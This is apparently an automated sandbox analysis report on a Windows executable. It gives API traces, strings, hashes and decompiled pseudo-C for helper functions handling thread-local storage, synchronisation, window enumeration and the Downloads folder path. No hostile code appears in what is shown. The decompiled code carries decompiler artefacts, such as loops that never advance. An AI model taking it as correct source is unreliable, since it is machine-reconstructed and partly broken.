Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E20C
Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(02790000,00000000,?,?), ref: 0040E267

LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040A803
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A815
wcscpy.MSVCRT ref: 0040A83B
wcscat.MSVCRT ref: 0040A846
wcslen.MSVCRT ref: 0040A84C
CoTaskMemFree.OLE32(?,00000000,00000000,?,02799B50,00000000,00000000), ref: 0040A85A
FreeLibrary.KERNEL32(00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,004046B8,00000000), ref: 0040A861
wcscat.MSVCRT ref: 0040A879
wcslen.MSVCRT ref: 0040A87F

Strings

Shell32.DLL, xrefs: 0040A7FE
Downloads\, xrefs: 0040A873
SHGetKnownFolderPath, xrefs: 0040A80F

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrarywcscatwcslen$AddressAllocateHeapLoadProcTaskValuewcscpy
String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
API String ID: 1878685483-287042676
Opcode ID: d8047ec1b211d1abfdd77f67eb398c2beda1c06acf7c2fe8683d516af209cf70
Instruction ID: a59125e26d23ccb30f5fa0f47659a7dbf798ada992acc4f36018911529e702ca
Opcode Fuzzy Hash: d8047ec1b211d1abfdd77f67eb398c2beda1c06acf7c2fe8683d516af209cf70
Instruction Fuzzy Hash: 0D210A32244301B6E11037A2AD4AF6B3A68CB41B94F10843BFD01B51C1D6BC897696AF

Uniqueness

Uniqueness Score: -1.00%

Function 00411D62, Relevance: 19.6, APIs: 13, Instructions: 74
memoryregistrythreadCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00411D62(intOrPtr _a4, intOrPtr _a8) {
				void* _t11;
				void** _t12;
				void* _t13;
				void* _t14;
				void* _t20;
				void* _t24;
				HANDLE* _t25;

				if( *0x417678 == 0) {
					 *0x417698 = TlsAlloc();
					InitializeCriticalSection(0x417680);
					 *0x417678 = 1;
				}
				_t20 = TlsGetValue( *0x417698);
				if(_t20 != 0) {
					L7:
					_t11 = HeapAlloc( *0x417008, 0, 0xc);
					if(_t11 != 0) {
						 *((intOrPtr*)(_t11 + 4)) = _a4;
						 *((intOrPtr*)(_t11 + 8)) = _a8;
						 *_t11 =  *(_t20 + 8);
						 *(_t20 + 8) = _t11;
						return _t11;
					}
				} else {
					_t11 = HeapAlloc( *0x417008, 8, 0x14);
					_t20 = _t11;
					if(_t20 != 0) {
						EnterCriticalSection(0x417680);
						_t12 =  *0x41767c; // 0x0
						if(_t12 != 0) {
							 *_t12 = _t20;
						}
						 *(_t20 + 4) = _t12;
						 *0x41767c = _t20;
						LeaveCriticalSection(0x417680);
						_t25 = _t20 + 0x10;
						_t13 = GetCurrentProcess();
						_t14 = GetCurrentThread();
						DuplicateHandle(GetCurrentProcess(), _t14, _t13, _t25, 0x100000, 0, 0);
						_t3 = _t20 + 0xc; // 0xc
						__imp__RegisterWaitForSingleObject(_t3,  *_t25, E00411E5A, _t20, 0xffffffff, 8, _t24);
						TlsSetValue( *0x417698, _t20);
						goto L7;
					}
				}
				return _t11;
			}

0x00411d70
0x00411d79
0x00411d7e
0x00411d84
0x00411d84
0x00411d9a
0x00411d9e
0x00411e2b
0x00411e35
0x00411e3d
0x00411e43
0x00411e4a
0x00411e50
0x00411e52
0x00000000
0x00411e52
0x00411da4
0x00411dae
0x00411db4
0x00411db8
0x00411dbf
0x00411dc5
0x00411dcc
0x00411dce
0x00411dce
0x00411dd2
0x00411dd5
0x00411ddb
0x00411de7
0x00411df4
0x00411df7
0x00411e01
0x00411e13
0x00411e17
0x00411e24
0x00000000
0x00411e2a
0x00411db8
0x00411e57

APIs

TlsAlloc.KERNEL32(?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00411D72
InitializeCriticalSection.KERNEL32(00417680,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 00411D7E
TlsGetValue.KERNEL32(?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00411D94
HeapAlloc.KERNEL32(00000008,00000014,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411DAE
EnterCriticalSection.KERNEL32(00417680,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 00411DBF
LeaveCriticalSection.KERNEL32(00417680,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411DDB
GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000), ref: 00411DF4
GetCurrentThread.KERNEL32 ref: 00411DF7
GetCurrentProcess.KERNEL32(00000000,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411DFE
DuplicateHandle.KERNEL32(00000000,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411E01
RegisterWaitForSingleObject.KERNEL32 ref: 00411E17
TlsSetValue.KERNEL32(00000000,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411E24
HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411E35

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
String ID:
API String ID: 298514914-0
Opcode ID: bdee7e9acd0791c466288ec044d2aaab850532c309e9e3b615f344bc37c153a3
Instruction ID: 8d0ee0ed933d17ffb5573716605f6a27c21e7768710c452de208be154d108613
Opcode Fuzzy Hash: bdee7e9acd0791c466288ec044d2aaab850532c309e9e3b615f344bc37c153a3
Instruction Fuzzy Hash: 91210770645301EFDB109FA4FC88B963B7AFB08761F11C43AFA059A2A5DB74D840CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9E3, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53
librarysleeploaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040D9E3(void* __ecx, LONG* _a4, intOrPtr _a8) {
				char _v8;
				struct HINSTANCE__* _t5;
				long _t7;
				int _t9;
				_Unknown_base(*)()* _t10;
				void* _t13;
				struct HINSTANCE__* _t18;
				LONG* _t21;

				_t13 = 0;
				_t5 = LoadLibraryW( &M00412700);
				_t21 = _a4;
				_t18 = _t5;
				if(_t18 == 0) {
					L4:
					_t7 = InterlockedCompareExchange(_t21, 1, 0);
					if(_t7 == 0) {
						_a8();
						_t9 = InterlockedExchange(_t21, 2);
					} else {
						_t9 = _t7 - 1;
						if(_t9 == 0) {
							while( *_t21 != 2) {
								Sleep(0);
							}
						}
					}
				} else {
					_t10 = GetProcAddress(_t18, "InitOnceExecuteOnce");
					if(_t10 != 0) {
						 *_t10(_t21, E0040D9C3, _a8,  &_v8);
						_t13 = 1;
					}
					_t9 = FreeLibrary(_t18);
					if(_t13 == 0) {
						goto L4;
					}
				}
				return _t9;
			}

0x0040d9ef
0x0040d9f1
0x0040d9f7
0x0040d9fa
0x0040d9fe
0x0040da2b
0x0040da36
0x0040da39
0x0040da4f
0x0040da55
0x0040da3b
0x0040da3b
0x0040da3c
0x0040da48
0x0040da42
0x0040da42
0x0040da4d
0x0040da3c
0x0040da00
0x0040da06
0x0040da0e
0x0040da1d
0x0040da1f
0x0040da1f
0x0040da21
0x0040da29
0x00000000
0x00000000
0x0040da29
0x0040da61

APIs

LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040D7F5,00417614,0040D982,00000000,FFFFFFED,00000200,77E34620,00409E16,FFFFFFED,00000010), ref: 0040D9F1
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA06
FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA21
InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040DA30
Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA42
InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040DA55

Strings

Kernel32.dll, xrefs: 0040D9EA
InitOnceExecuteOnce, xrefs: 0040DA00

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
String ID: InitOnceExecuteOnce$Kernel32.dll
API String ID: 2918862794-1339284965
Opcode ID: 6d048d891e2cf8fbf7d8d619f0fa725de381c314969143a28184dc53c1081fbd
Instruction ID: 78d57fd6bf002b5b6c2ef9560121a390c40c5b5e23dd256736785be4ed7191ec
Opcode Fuzzy Hash: 6d048d891e2cf8fbf7d8d619f0fa725de381c314969143a28184dc53c1081fbd
Instruction Fuzzy Hash: 0E01D431B14204BBD7102FE4AC49FEB3B29EB86B12F11803AF505A11C4DB788909CA6D

Uniqueness

Uniqueness Score: -1.00%

Function 004094A7, Relevance: 12.0, APIs: 8, Instructions: 50
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004094A7(struct HWND__* _a4) {
				long _t8;
				struct HWND__* _t23;
				intOrPtr* _t25;

				_t23 = _a4;
				_t8 = GetWindowThreadProcessId(_t23, 0);
				if(_t8 == GetCurrentThreadId() && IsWindowVisible(_t23) != 0) {
					_t25 = E0040DB12(0x4170e4, 0x14);
					 *(_t25 + 4) = _t23;
					 *_t25 = GetCurrentThreadId();
					 *((short*)(_t25 + 8)) = 0;
					if((GetWindowLongW(_t23, 0xffffffec) & 0x00000008) != 0) {
						 *((char*)(_t25 + 8)) = 1;
					}
					if(_t23 != GetForegroundWindow() && IsWindowEnabled(_t23) != 0) {
						 *((char*)(_t25 + 9)) = 1;
						EnableWindow(_t23, 0);
					}
				}
				return 1;
			}

0x004094aa
0x004094b1
0x004094c3
0x004094dc
0x004094e0
0x004094e9
0x004094ec
0x004094f8
0x004094fa
0x004094fa
0x00409506
0x00409515
0x00409519
0x00409519
0x00409506
0x00409525

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 004094B1
GetCurrentThreadId.KERNEL32 ref: 004094BF
IsWindowVisible.USER32(?), ref: 004094C6

Part of subcall function 0040DB12: HeapAlloc.KERNEL32(00000008,00000000,0040D38C,00417608,00000014,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB1E

GetCurrentThreadId.KERNEL32 ref: 004094E3
GetWindowLongW.USER32(?,000000EC), ref: 004094F0
GetForegroundWindow.USER32 ref: 004094FE
IsWindowEnabled.USER32(?), ref: 00409509
EnableWindow.USER32(?,00000000), ref: 00409519

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
String ID:
API String ID: 3383493704-0
Opcode ID: 1f4750660798c3bab16e5480091953d12569fa84976fdb8457a986ceb55f5c55
Instruction ID: d72cecd996af7503d4a55556d0eaf5d1fe8b6ec4fae3718c35eb9c11583601b7
Opcode Fuzzy Hash: 1f4750660798c3bab16e5480091953d12569fa84976fdb8457a986ceb55f5c55
Instruction Fuzzy Hash: B10175312043016ED3215B79AC88AAB7AE8EF95754B15803EF545E31A6DB74DC01C669

Uniqueness

Uniqueness Score: -1.00%

Function 00408E54, Relevance: 10.6, APIs: 7, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00408E54(struct HWND__* _a4, intOrPtr _a8, signed int _a12) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				long _t20;
				WCHAR* _t22;
				int _t33;

				_t10 = _a8;
				if(_t10 == 0) {
					UnregisterClassW( *0x416114,  *0x41700c);
					 *0x4170c8 = 1;
				} else {
					_t13 = _t10 - 0xe;
					if(_t13 == 0) {
						L6:
						E00409292();
						DestroyWindow(_a4);
					} else {
						if(_t13 != 0x101) {
							return DefWindowProcW();
						}
						_t19 = (_a12 & 0x0000ffff) - 0x3e8;
						if(_t19 == 0) {
							_t20 = GetWindowLongW(_a4, 0xffffffeb);
							_t5 = GetWindowTextLengthW( *0x4170d0) + 1; // 0x1
							_t33 = _t5;
							_t22 = HeapAlloc( *0x417008, 0, _t33 + _t33);
							 *_t20 = _t22;
							GetWindowTextW( *0x4170d0, _t22, _t33);
							E00409292();
							DestroyWindow(_a4);
						} else {
							if(_t19 == 1) {
								goto L6;
							}
						}
					}
				}
				return 0;
			}

0x00408e5b
0x00408e5c
0x00408ef3
0x00408ef9
0x00408e62
0x00408e62
0x00408e65
0x00408e85
0x00408e85
0x00408e8d
0x00408e67
0x00408e6c
0x00408e6f
0x00408e6f
0x00408e7b
0x00408e80
0x00408e9c
0x00408eb0
0x00408eb0
0x00408ebf
0x00408ecd
0x00408ecf
0x00408ed5
0x00408edd
0x00408e82
0x00408e83
0x00000000
0x00000000
0x00408e83
0x00408e80
0x00408e65
0x00408f06

APIs

DestroyWindow.USER32(?), ref: 00408E8D
GetWindowLongW.USER32(?,000000EB), ref: 00408E9C
GetWindowTextLengthW.USER32 ref: 00408EAA
HeapAlloc.KERNEL32(00000000), ref: 00408EBF
GetWindowTextW.USER32 ref: 00408ECF
DestroyWindow.USER32(?), ref: 00408EDD
UnregisterClassW.USER32 ref: 00408EF3

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
String ID:
API String ID: 2895088630-0
Opcode ID: ceb989c364a64a77ca9268f30e2f22e8c5aea8804ddba6594e2583a28b0bbdfa
Instruction ID: f973f4e0a74c58c8f3dc6b35f62902cd2ce24d79b6cf0357400b1c80f0f6dd69
Opcode Fuzzy Hash: ceb989c364a64a77ca9268f30e2f22e8c5aea8804ddba6594e2583a28b0bbdfa
Instruction Fuzzy Hash: 5011CE3100821AFBCB116F64FD0C9AA3F66EB18395B11C03AF949A22F4DA799951DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409528, Relevance: 9.1, APIs: 6, Instructions: 68
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409528(long _a4) {
				int _t11;
				long _t12;
				int _t15;
				intOrPtr* _t16;
				intOrPtr* _t17;
				intOrPtr* _t22;
				intOrPtr* _t23;

				if(_a4 == 0) {
					_t22 =  *0x4170e4; // 0x0
					if(_t22 != 0) {
						do {
							_t16 =  *_t22;
							_t6 = _t22 + 8; // 0x8
							_t25 = _t6;
							_t12 = GetCurrentThreadId();
							if( *_t6 == _t12) {
								if( *((char*)(_t22 + 0x11)) != 0) {
									EnableWindow( *(_t22 + 0xc), 1);
								}
								if( *((char*)(_t22 + 0x10)) != 0) {
									SetWindowPos( *(_t22 + 0xc), 0xffffffff, 0, 0, 0, 0, 3);
								}
								_t12 = E0040DAD2(0x4170e4, _t25);
							}
							_t22 = _t16;
						} while (_t16 != 0);
						return _t12;
					}
				} else {
					_t11 = EnumWindows(E004094A7, _a4);
					_t23 =  *0x4170e4; // 0x0
					if(_t23 != 0) {
						do {
							_t17 =  *_t23;
							_t15 = GetCurrentThreadId();
							if( *((intOrPtr*)(_t23 + 8)) == _t15 &&  *((char*)(_t23 + 0x10)) != 0) {
								_t15 = SetWindowPos( *(_t23 + 0xc), 0xfffffffe, 0, 0, 0, 0, 3);
							}
							_t23 = _t17;
						} while (_t17 != 0);
						return _t15;
					}
				}
				return _t11;
			}

0x00409530
0x0040957d
0x00409585
0x0040958a
0x0040958a
0x0040958c
0x0040958c
0x0040958f
0x00409598
0x0040959e
0x004095a5
0x004095a5
0x004095af
0x004095bc
0x004095bc
0x004095c8
0x004095ce
0x004095cf
0x004095d1
0x00000000
0x004095d5
0x00409532
0x0040953b
0x00409541
0x00409549
0x00409551
0x00409551
0x00409553
0x0040955c
0x0040956f
0x0040956f
0x00409575
0x00409577
0x00000000
0x00409551
0x00409549
0x004095d9

APIs

EnumWindows.USER32(004094A7,?), ref: 0040953B
GetCurrentThreadId.KERNEL32 ref: 00409553
SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040956F
GetCurrentThreadId.KERNEL32 ref: 0040958F
EnableWindow.USER32(?,00000001), ref: 004095A5
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095BC

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CurrentThread$EnableEnumWindows
String ID:
API String ID: 2527101397-0
Opcode ID: ce8455a101d240a02109509219b5cc618f809e6c491c4b9dbe06f1833ead8f36
Instruction ID: f5bff55c5df6c6442a3445df2da52706b8c810d9f19cb65a9eb7b3fa66b57753
Opcode Fuzzy Hash: ce8455a101d240a02109509219b5cc618f809e6c491c4b9dbe06f1833ead8f36
Instruction Fuzzy Hash: 6A11AC32609351BBD7324B17EC08F53BBA9AB81B21F15863EF456221E1DB759D00C618

Uniqueness

Uniqueness Score: -1.00%

Function 0040D2F3, Relevance: 9.1, APIs: 6, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040D2F3(long _a4, long _a8, long _a12) {
				long _t7;
				long _t8;
				long* _t12;
				void* _t18;
				long _t21;
				signed int _t23;
				long _t28;
				long _t29;
				long _t30;
				void* _t31;

				_t29 = _a4;
				_t23 = _t29 & 0x00000003;
				if(_t23 != 0) {
					_t18 = 4;
					_t29 = _t29 + _t18 - _t23;
				}
				_t7 =  *0x41760c; // 0x10
				if(_t7 == 0) {
					 *0x417610 = TlsAlloc();
					TlsSetValue( *0x417610, HeapAlloc( *0x417008, 8, _t29));
					_t7 =  *0x41760c; // 0x10
				}
				_t28 = _t7;
				_t8 = _t7 + _t29;
				 *0x41760c = _t8;
				_t31 = HeapReAlloc( *0x417008, 8, TlsGetValue( *0x417610), _t8);
				TlsSetValue( *0x417610, _t31);
				_t30 = _a8;
				_t21 = _a12;
				if(_t30 != 0 || _t21 != 0) {
					_t12 = E0040DB12(0x417608, 0x14);
					 *_t12 = _t28;
					_t12[1] = _t30;
					_t12[2] = _t21;
					if(_t30 != 0) {
						 *_t30(_t31 + _t28);
					}
				}
				return _t28;
			}

0x0040d2f6
0x0040d2fd
0x0040d300
0x0040d304
0x0040d307
0x0040d307
0x0040d309
0x0040d316
0x0040d327
0x0040d339
0x0040d33b
0x0040d33b
0x0040d340
0x0040d342
0x0040d34b
0x0040d365
0x0040d36e
0x0040d370
0x0040d374
0x0040d37a
0x0040d387
0x0040d38e
0x0040d390
0x0040d393
0x0040d398
0x0040d39e
0x0040d3a0
0x0040d398
0x0040d3a7

APIs

TlsAlloc.KERNEL32(?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D318
HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D32C
TlsSetValue.KERNEL32(00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D339
TlsGetValue.KERNEL32(00000010,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D350
HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D35F
TlsSetValue.KERNEL32(00000000,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D36E

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocValue$Heap
String ID:
API String ID: 2472784365-0
Opcode ID: bf16ee7e76be1fa04c8f8f9f6ecfdcdea20948edfbd20feb47145de7ddf136ce
Instruction ID: 9f859b01fecb640b0c0eeeefa64339d4fa0418cdbc8b4e3825918bdf59145f1e
Opcode Fuzzy Hash: bf16ee7e76be1fa04c8f8f9f6ecfdcdea20948edfbd20feb47145de7ddf136ce
Instruction Fuzzy Hash: 76116072B44710AFD7119FA9EC48AA67BB9FB48760B05843AFA04D33A0D7359C048B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00411CE4, Relevance: 9.0, APIs: 6, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00411CE4(void* _a4) {
				void* _t11;
				long _t16;
				void _t17;
				void* _t18;
				void* _t19;
				void* _t21;

				_t19 = _a4;
				__imp__UnregisterWait( *((intOrPtr*)(_t19 + 0xc)));
				CloseHandle( *(_t19 + 0x10));
				EnterCriticalSection(0x417680);
				_t17 =  *_t19;
				_t11 =  *(_t19 + 4);
				if(_t17 == 0) {
					 *0x41767c = _t11;
				} else {
					 *(_t17 + 4) = _t11;
				}
				_t18 =  *(_t19 + 4);
				if(_t18 != 0) {
					 *_t18 =  *_t19;
				}
				LeaveCriticalSection(0x417680);
				_t16 =  *(_t19 + 8);
				while(_t16 != 0) {
					_t21 = _t16;
					_t16 =  *_t16;
					 *((intOrPtr*)(_t21 + 4))( *((intOrPtr*)(_t21 + 8)));
					HeapFree( *0x417008, 0, _t21);
				}
				return HeapFree( *0x417008, _t16, _t19);
			}

0x00411ce7
0x00411cee
0x00411cf7
0x00411d03
0x00411d09
0x00411d0b
0x00411d10
0x00411d17
0x00411d12
0x00411d12
0x00411d12
0x00411d1c
0x00411d21
0x00411d25
0x00411d25
0x00411d28
0x00411d2e
0x00411d4c
0x00411d33
0x00411d35
0x00411d3a
0x00411d46
0x00411d46
0x00411d61

APIs

UnregisterWait.KERNEL32(?), ref: 00411CEE
CloseHandle.KERNEL32(?,?,?,?,00411E6A,?), ref: 00411CF7
EnterCriticalSection.KERNEL32(00417680,?,?,?,00411E6A,?), ref: 00411D03
LeaveCriticalSection.KERNEL32(00417680,?,?,?,00411E6A,?), ref: 00411D28
HeapFree.KERNEL32(00000000,00000000,?,?,?,00411E6A,?), ref: 00411D46
HeapFree.KERNEL32(?,?,?,?,?,00411E6A,?), ref: 00411D58

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
String ID:
API String ID: 4204870694-0
Opcode ID: abb9133c54fbe8d7efa3480d1120fe62ec6eeac9e18d1619677bbddffc82dd13
Instruction ID: 8f9f96d7996d446dd79b7cbdc6e3cce5d3da35cfe841f16b8799e142d118698f
Opcode Fuzzy Hash: abb9133c54fbe8d7efa3480d1120fe62ec6eeac9e18d1619677bbddffc82dd13
Instruction Fuzzy Hash: 6B012574202601BFCB119F15FD88A96BB79FF493513118139E61A87630C735AC51CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004057F0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004057F0(void* __ebx, void* __edi, void* __esi, wchar_t* _a4, intOrPtr _a8, wchar_t* _a12, intOrPtr _a16) {
				wchar_t* _v4;
				void* __ecx;
				signed int _t25;
				signed int _t26;
				void* _t27;
				long _t33;
				int _t34;
				wchar_t* _t36;
				wchar_t* _t38;
				int _t40;
				void* _t41;
				wchar_t* _t42;
				intOrPtr _t44;
				long* _t45;
				void* _t47;
				void* _t48;
				wchar_t* _t51;
				wchar_t* _t52;
				wchar_t* _t53;
				int _t55;
				void* _t60;

				_t44 = _a8;
				_t55 = 0;
				if(_t44 < 1) {
					return E0040E2A0(_t41, _a16);
				} else {
					_t51 = _a4;
					if(_t51 == 0) {
						_t51 = 0x412024;
					}
					_t42 = _a12;
					if(_t42 == 0) {
						_t42 = 0x412024;
						_a12 = 0x412024;
					}
					_t25 =  *_t42 & 0x0000ffff;
					_t47 = 0;
					_v4 = _t25;
					_t36 = _t51;
					_a4 = _t36;
					if(_t25 == 0 || _t42[0] == 0) {
						_t42 = _v4;
						while(1) {
							_t26 =  *_t51 & 0x0000ffff;
							if(_t26 == _t42 || _t26 == 0) {
								goto L20;
							}
							L23:
							_t51 =  &(_t51[0]);
							continue;
							L20:
							_t47 = _t47 + 1;
							if(_t47 == _t44) {
								_t55 = _t51 - _t36 >> 1;
							} else {
								if(_t26 != 0) {
									_t17 =  &(_t51[0]); // 0x0
									_t36 = _t17;
									goto L23;
								}
							}
							goto L26;
						}
					} else {
						_t38 = _t42;
						_t8 =  &(_t38[0]); // 0x412026
						_t45 = _t8;
						do {
							_t33 =  *_t38;
							_t38 =  &(_t38[0]);
						} while (_t33 != 0);
						_t40 = _t38 - _t45 >> 1;
						while(1) {
							L10:
							_t34 = wcsncmp(_t51, _t42, _t40);
							_t60 = _t60 + 0xc;
							if(_t34 != 0 &&  *_t51 != _t55) {
								break;
							}
							_t47 = _t47 + 1;
							if(_t47 == _a8) {
								_t36 = _a4;
								_t55 = _t51 - _t36 >> 1;
							} else {
								if( *_t51 == _t55) {
									_t36 = _a4;
								} else {
									_t42 = _a12;
									_t51 = _t51 + _t40 * 2;
									_a4 = _t51;
									continue;
								}
							}
							goto L26;
						}
						_t42 = _a12;
						_t51 =  &(_t51[0]);
						goto L10;
					}
					L26:
					_t27 = E0040E180(_t42, _t51);
					_t52 = _a12;
					_t48 = _t27;
					if(_t48 != 0) {
						memmove(E0040E1D0(_t42, _t52), _t36, _t55 * 2);
						_t60 = _t60 + 0xc;
					}
					_t53 = E0040E200(_t55, _t52);
					if(_t48 == 0) {
						wcsncpy(_t53, _t36, _t55);
					}
					 *((short*)(_t53 + _t55 * 2)) = 0;
					return 0;
				}
			}

0x004057f1
0x004057f6
0x004057fb
0x0040591a
0x00405801
0x00405803
0x0040580a
0x0040580c
0x0040580c
0x00405811
0x00405817
0x00405819
0x0040581e
0x0040581e
0x00405822
0x00405825
0x00405827
0x0040582b
0x0040582d
0x00405834
0x00405892
0x00405896
0x00405896
0x0040589c
0x00000000
0x00000000
0x004058b0
0x004058b0
